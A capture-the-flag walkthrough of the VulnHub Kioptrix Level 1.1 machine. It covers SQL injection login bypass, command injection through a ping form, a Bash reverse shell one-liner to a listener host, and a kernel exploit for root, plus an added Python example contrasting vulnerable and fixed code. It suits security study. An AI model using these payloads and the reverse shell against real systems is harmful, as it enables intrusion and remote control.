VulnHub – Kioptrix: Level 1.1 Walkthrough

Introduction

This was an easy Linux machine that involved exploiting an SQL injection to authenticate into a web application, exploiting a remote command execution vulnerability to gain remote access and using a kernel exploit to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -oA to save the output in all formats available

Enumerating HTTP

Upon accessing the web server through a browser, the below login page is displayed:

After trying a few common and/or default credentials without success, the next step was to run a Nikto scan to gain more information about the target and any possible exploitation routes:

Sadly, the scan did not identify anything useful. The next step is to scan for hidden files and directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Exploiting SQL Injection and Remote Command Execution

It turns out the authentication can be bypassed by using the following payload in the username field:

admin' OR 1=1#

This means the query used to perform the authentication will look like the following:

SELECT * FROM users WHERE username = 'admin' OR 1=1#' AND <rest of the query, now commented out>

Since 1=1 is always true, the WHERE clause matches regardless of the credentials supplied and the application lets us log in. The # comments out the rest of the query, just in case.

This leads to a page that allows pinging other machines by entering an IP address:

Adding a semicolon terminates the ping command and allows arbitrary commands to be injected after it:

As shown below, the injected command was run and its output is displayed on the web page:
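The two input-handling flaws the walkthrough exploits, the login query built by string concatenation and the ping command handed to a shell, shown beside their fixed forms, as an added Python example (not code from the Kioptrix machine or the original post). sqlite3 with a constructed in-memory users table stands in for the application's database; note that SQLite comments with --, whereas the # in the page's payload is MySQL syntax.

```python
import ipaddress
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

def login_vulnerable(conn, username, password):
    # Input is concatenated into the SQL text: a quote in the username closes
    # the string literal and the comment marker discards the password check.
    sql = (f"SELECT * FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Bound parameters travel separately from the SQL text, so quotes and
    # comment markers in the input are compared as plain data.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Same shape as the walkthrough's payload; SQLite comments with --, the # used
# on the page is MySQL syntax.
SQLI_PAYLOAD = "admin' OR 1=1--"

def ping_command_vulnerable(target):
    # Line handed to a shell: ';' ends ping and whatever follows runs as a command.
    return f"ping -c 1 {target}"

def ping_argv_safe(target):
    # Parse as an IP address (ValueError otherwise) and pass it as its own argv
    # element, so no shell ever interprets the input.
    ip = ipaddress.ip_address(target)
    return ["ping", "-c", "1", str(ip)]

def demo():
    conn = make_db()
    results = {
        "vuln_login_bypassed": login_vulnerable(conn, SQLI_PAYLOAD, "wrong"),
        "safe_login_bypassed": login_safe(conn, SQLI_PAYLOAD, "wrong"),
        "safe_login_valid": login_safe(conn, "admin", "correct-horse"),
    }
    try:
        ping_argv_safe("10.0.0.1; id")
        results["safe_ping_rejected"] = False
    except ValueError:
        results["safe_ping_rejected"] = True
    return results
```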

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using a Bash reverse shell to connect to the listener:

bash -i >& /dev/tcp/192.168.181.131/1234 0>&1

A callback was received, granting a shell as the apache user:

Privilege Escalation

When enumerating the operating system and kernel, it appears the machine is running Linux kernel 2.6.9-55:

Using SearchSploit to look for known vulnerabilities in this version of the Linux kernel:

Mirroring the exploit onto the Kali host:

Transferring the exploit to the target machine using the Python web server and Wget:

Compiling the exploit using GCC, allocating execute permissions to it and executing it:

This has granted a root-level shell with full access to the machine.

Conclusion

Although this machine was quite an easy challenge, it had some interesting elements, such as the SQL injection (although it would have been more interesting if the vector had been a little less common) and the remote command execution vulnerability, which is quite common when web applications execute Bash commands from web pages or scripts.